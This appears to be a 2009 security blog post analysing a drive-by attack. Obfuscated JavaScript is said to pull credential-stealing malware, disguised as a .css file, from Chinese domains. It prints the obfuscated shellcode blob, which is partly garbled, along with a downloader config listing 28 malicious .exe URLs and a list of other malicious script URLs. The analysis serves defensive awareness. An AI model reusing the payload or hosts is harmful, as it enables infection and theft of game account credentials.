MalwareIntelligence is a site dedicated to research on all matters relating to anti-malware security, criminology computing and information security in general, always from a perspective closely related to the field of intelligence.

5.2.09

Exploitation of vulnerabilities through JS

Exploiting vulnerabilities across different types of file format has become commonplace and highly used method for the creators and disseminators of malware.

These methods, which are also combined with different strategies, they become a time bomb that is detonated by the simple act of accessing a page maliciously manipulated to accommodate these attack strategies.

Numerous cases such as using different weaknesses exploited through files .js, .swf, .pdf, .mp3, even pretending to be files .css, put on shows that any type of file is free to be used as channel spread much less as a vector for infection.

In recent weeks, a wave file. Js files are being used to redirect the download of malicious code through obfuscated scripts that hide in the body of the JavaScript, as the following, which is hosted at URL http://www710sese.cn/a1/realdadong.js whose md5 hash is d1094b907dfe99784b206d2ae9b1fe97:

var mybr = unescape (% u17eb% u6090% u645e% u0000% u30a1% u0800% U0500% uf88b% u0000%u00b9% u0004% uf300% uffa4%
ue8e0% uffe4% ua164% uffff% u0030% u0000% u408b% u8b0c%u1c70% u8bad% uec81% u0870% u0200% u0000% uec8b
ue8bb%%% u020f% u8503% u8b00 ub u0fc0%B85% u0000% uff00% ue903% u0221% u0000% u205d% u895b% u6856% cfu
98% u0e8a%ub1e8% u0000% u8900% u6856% u0c45% u4e8e% uec0e% ua3e8% u0000% u8900% u0445% u6856% u79c1
% ub8e5% u95e8% u0000% u8900 "+"% u1c45% uc61b% u6856% u7946% u87e8% u0000% u8900% u1045% u6856% UFCA
% u7c0d% u79e8% u0000% u8900% u0845% u84e7% u6856%ub469% u6be8% u0000% u8900% u1445% u020f% ue0bb%
uc7f6% u8900% u3303% u2845% u5255% u4D4C% u45c7% u4f2c% u004e% u285d% u8d00% uff53% u0455% u6850% u1a3
6% u702f% u3fe8% u0000% u8900% u2445% u7f6a% u5d8d% u55ff% u5328% u0544% uc71c% u5c28% u652e% uc778%u0
544% u652c% u0000% u5600% u287d% u8d56% uff57% uff56% u2075% u2455% u5756% u55ff%ue80c% u0062% u0000%
uc481% u0200% u0000% u3361% u0004% uc2c0% u8b55% u51ec% u8b53% u087d% u5d8b% u738b% u560c% u8b3c% u1
e74% u56f3% u0378% u768b% u0320% u33f3% uuad41% 49c9% u3356% uc303% u0ff6% u10be% uf23a% u0874% ucec1%
u030d% u40f2% uf uf1eb%u755e% E3B% u5ae5% ueb8b% u5a8b% u0324% u66dd% u0c8b% u8b4b% u1c5a% udd03% u04
8b% uu5ec5% 038b% uc25d% u595b% u0008% u92e9% u0000% u5e00% u80bf% ub900% u020c%u0100% u0000% ua4f3%
uec81% u0100% u0000% ufc8b% uc783% uc710% u6474% u6e07% uc76c% U0447% u006c% u0000% u0455% u458% uff57
9% uc724% u6c74% u5207% u0447% uc741% u6c6c% U636f% u47c7% u6108% u6574% uc748% u0c47% u6165% u0070% u
U55ff% 5057% u8b08% ub8f0% u0fe4% u0002% u07c7% u3089% u736d% u6376% u47c7% u7204% u0074% u5700% u55ff%
u8b04% u3c48% u8c8b% u8008% u0000% u3900% u0834% u0474% uf9e2% u12eb% u5508% u348d% u406a% u046th% uff5
6% u1055% u06c7% u0c80% uc481% u0002% u0100% u0000% ue8c3% uff69% uffff% u048b% u5324% u5251% u5756% UEC
b9% u020f% u8b00% u75db% u8519% u3350% u33c9% u83db% uub70f% 06e8% ufffb% u8118% u0015% u833e% U7500%
ub70f% u06e8% u8118% u0035% ufffb% U7500% U8330% ub70f% u02e8% u8318% u2575% u6afb% u8b04% uc083% ub830
u0fe0%% u0002% u0068% u0000% u6801% u0000% U1000% u10ff% u006a% u0689% u4489% u1824% uecb9%u020f% uff0
0% u5f01% u5a5e% u5b59% ue4b8% u020f% uff00% ue820% ufdda% uffff% u7468% u7074% u2f3a% u642f% u772e% u6965
% u632e% u6b78% u6d6f% u6e2f% u7765% u612f% u2e31% u7363% u0073);

The point is that, between the lines of this obfuscated script is executed to download a binary file from a different URL, called a1.css appears to be a .css (Cascading Style Sheets). This binary is a malware.



Furthermore, between the middle of all the infection process, which lasts only a few seconds, set against the splice connection txt.hsdee.com and www.wdswe.com, where, since the former makes a Drive-by Update on file oo.txt for when he replies with a 200 "OK", download the binaries provided in that file. The first one from http://www.wdswe.com/new/new1.exe (md5: 1c0b699171f985b1eab092bf83f2ad37).

The information is read into the text file is:

[file]
open = and

url1 = http://www.wdswe .com/new/new1. exe

url2 = http://www.wdswe .com/new/new2. exe

url3 = http://www.wdswe .com/new/new3. exe

url4 = http://www.wdswe .com/new/new4. exe

url5 = http://www.wdswe .com/new/new5. exe

url6 = http://www.wdswe .com/new/new6. exe

url7 = http://www.wdswe .com/new/new7. exe

url8 = http://www.wdswe .com/new/new8. exe

url9 = http://www.wdswe .com/new/new9. exe

url10 = http://www.wdswe .com/new/new10. exe

url11 = http://www.wdswe .com/new/new11. exe

url12 = http://www.wdswe .com/new/new12. exe

url13 = http://www.wdswe .com/new/new13. exe

url14 = http://www.wdswe .com/new/new14. exe

url15 = http://www.wdswe .com/new/new15. exe

url16 = http://www1.wdswe .com/new/new16. exe

url17 = http://www1.wdswe .com/new/new17. exe

url18 = http://www1.wdswe .com/new/new18. exe

url19 = http://www1.wdswe .com/new/new19. exe

url20 = http://www1.wdswe .com/new/new20. exe

url21 = http://www1.wdswe .com/new/new21. exe

url22 = http://www1.wdswe .com/new/new22. exe

url23 = http://www1.wdswe .com/new/new23. exe

url24 = http://www1.wdswe .com/new/new24. exe

url25 = http://www1.wdswe .com/new/new25. exe

url26 = http://www1.wdswe .com/new/new26. exe

url27 = http://www1.wdswe .com/new/new27. exe

url28 = http://www1.wdswe .com/new/new28. exe

count = 28


In this way the infection with several malicious codes, most of them designed to steal authentication credentials online games like WoW.

Some other URL's used to spread malware in the same way are:

http://97.haowyt .com / js / baidu. js

http://97.haowyt .com / js / baidu. js

http://www.163wyt .com / js / yahoo. js

http://www.710sese .cn/a1/hohogl. js

http://www.710sese .cn/a1/wokaono. js

http://www.710sese .cn/a1/woriniss. js

http://qq.18i16 .net / lzz. js

http://qq.18i16 .net / bf. js

http://qq.18i16 .net / realplay. js

http://qq.18i16 .net / new. js

http://qq.18i16 .net / cx. js

http://www.baomaaa .cn/a1/realdadong. js
http://www.baomaaa .cn/a1/hohogl. js
http://www.baomaaa .cn/a1/wokaono. js

http://www.baomaaa .cn/a1/woriniss. js

http://tj.gan7788 .com / js / js. js

http://sss.2010wyt. net / r. js

http://sss.2010wyt .net/614. js


Despite the use, by malware creators of advanced techniques of infection, there is a fundamental element that can avoid becoming victims of similar attacks clearly focused on maintaining the updates completely current, including applications.

Related information
Drive-by Update to spread malware
New strategy to disseminate scareware IS
Massive exploitation of vulnerabilities through gh...
Danmec Bot, Fast-Flux networks and recruitment of ...
Schematic analysis of an attack from Web-based mal...

Jorge Mieres

0 comentarios:

Post a Comment